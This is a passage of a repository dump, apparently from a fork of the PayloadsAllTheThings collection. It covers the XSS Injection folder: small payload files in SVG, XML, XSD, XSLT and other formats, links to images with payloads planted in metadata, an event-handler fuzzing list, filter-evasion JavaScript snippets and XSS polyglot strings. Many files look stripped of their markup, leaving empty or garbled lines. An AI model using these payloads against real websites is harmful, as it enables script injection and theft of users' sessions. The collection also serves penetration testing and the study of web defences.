26 | "pygments_lexer": "ipython3",
27 | "version": "3.6.2"
28 | }
29 | },
30 | "nbformat": 4,
31 | "nbformat_minor": 2
32 | }
33 |
--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS.svg:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
9 |
--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS1.svg:
--------------------------------------------------------------------------------
1 | ]]>
2 |
--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS2.svg:
--------------------------------------------------------------------------------
1 | ]]>
2 |
--------------------------------------------------------------------------------
/XSS Injection/Files/SVG_XSS3.svg:
--------------------------------------------------------------------------------
1 | ]]>
2 |
--------------------------------------------------------------------------------
/XSS Injection/Files/SWF_XSS.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/SWF_XSS.swf
--------------------------------------------------------------------------------
/XSS Injection/Files/mouseover-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/mouseover-xss-ecs.jpeg
--------------------------------------------------------------------------------
/XSS Injection/Files/onclick-xss-ecs.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/onclick-xss-ecs.jpeg
--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg
--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_exif_corrupted.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_exif_corrupted.png
--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_metadata.jpg
--------------------------------------------------------------------------------
/XSS Injection/Files/payload_in_all_known_metadata.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_in_all_known_metadata.png
--------------------------------------------------------------------------------
/XSS Injection/Files/payload_text_xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/payload_text_xss.png
--------------------------------------------------------------------------------
/XSS Injection/Files/xml.xsd:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.cer:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.dtd:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.htm:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.html.demo:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.hxt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.mno:
--------------------------------------------------------------------------------
1 | alert(1337)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.rdf:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.svgz:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.url.url:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.vml:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.wsdl:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xht:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xhtml:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | alert(1)
5 | alert(2)
6 |
7 |
8 | confirm(document.domain)]]>
9 |
10 |
11 | Hello
12 |
13 |
14 | http://google.com
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsd:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsf:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xsl:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss.xslt:
--------------------------------------------------------------------------------
1 | alert(1)
--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png
--------------------------------------------------------------------------------
/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png
--------------------------------------------------------------------------------
/XSS Injection/Images/DwrkbH1VAAErOI2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/XSS Injection/Images/DwrkbH1VAAErOI2.jpg
--------------------------------------------------------------------------------
/XSS Injection/Intruders/0xcela_event_handlers.txt:
--------------------------------------------------------------------------------
1 | FSCommand
2 | onAbort
3 | onActivate
4 | onAfterPrint
5 | onAfterUpdate
6 | onBeforeActivate
7 | onBeforeCopy
8 | onBeforeCut
9 | onBeforeDeactivate
10 | onBeforeEditFocus
11 | onBeforePaste
12 | onBeforePrint
13 | onBeforeUnload
14 | onBeforeUpdate
15 | onBegin
16 | onBlur
17 | onBounce
18 | onCellChange
19 | onChange
20 | onClick
21 | onContextMenu
22 | onControlSelect
23 | onCopy
24 | onCut
25 | onDataAvailable
26 | onDataSetChanged
27 | onDataSetComplete
28 | onDblClick
29 | onDeactivate
30 | onDrag
31 | onDragDrop
32 | onDragEnd
33 | onDragEnter
34 | onDragLeave
35 | onDragOver
36 | onDragStart
37 | onDrop
38 | onEnd
39 | onError
40 | onErrorUpdate
41 | onFilterChange
42 | onFinish
43 | onFocus
44 | onFocusIn
45 | onFocusOut
46 | onHashChange
47 | onHelp
48 | onInput
49 | onKeyDown
50 | onKeyPress
51 | onKeyUp
52 | onLayoutComplete
53 | onLoad
54 | onLoseCapture
55 | onMediaComplete
56 | onMediaError
57 | onMessage
58 | onMouseDown
59 | onMouseEnter
60 | onMouseLeave
61 | onMouseMove
62 | onMouseOut
63 | onMouseOver
64 | onMouseUp
65 | onMouseWheel
66 | onMove
67 | onMoveEnd
68 | onMoveStart
69 | onOffline
70 | onOnline
71 | onOutOfSync
72 | onPaste
73 | onPause
74 | onPopState
75 | onProgress
76 | onPropertyChange
77 | onReadyStateChange
78 | onRedo
79 | onRepeat
80 | onReset
81 | onResize
82 | onResizeEnd
83 | onResizeStart
84 | onResume
85 | onReverse
86 | onRowDelete
87 | onRowExit
88 | onRowInserted
89 | onRowsEnter
90 | onScroll
91 | onSeek
92 | onSelect
93 | onSelectStart
94 | onSelectionChange
95 | onStart
96 | onStop
97 | onStorage
98 | onSubmit
99 | onSyncRestored
100 | onTimeError
101 | onTrackChange
102 | onURLFlip
103 | onUndo
104 | onUnload
105 | seekSegmentTime
106 |
--------------------------------------------------------------------------------
/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt:
--------------------------------------------------------------------------------
1 | alert`1`
2 | alert(1)
3 | alert(1)
4 | alert(1)
5 | (alert)(1)
6 | a=alert,a(1)
7 | [1].find(alert)
8 | top["al"+"ert"](1)
9 | top[/al/.source+/ert/.source](1)
10 | al\u0065rt(1)
11 | top['al\145rt'](1)
12 | top['al\x65rt'](1)
13 | top[8680439..toString(30)](1)
14 | navigator.vibrate(500)
15 | eval(URL.slice(-8))>#alert(1)
16 | eval(location.hash.slice(1)>#alert(1)
17 | innerHTML=location.hash>#
18 |
--------------------------------------------------------------------------------
/XSS Injection/Intruders/XSS_Polyglots.txt:
--------------------------------------------------------------------------------
1 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e
2 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>
3 | “ onclick=alert(1)//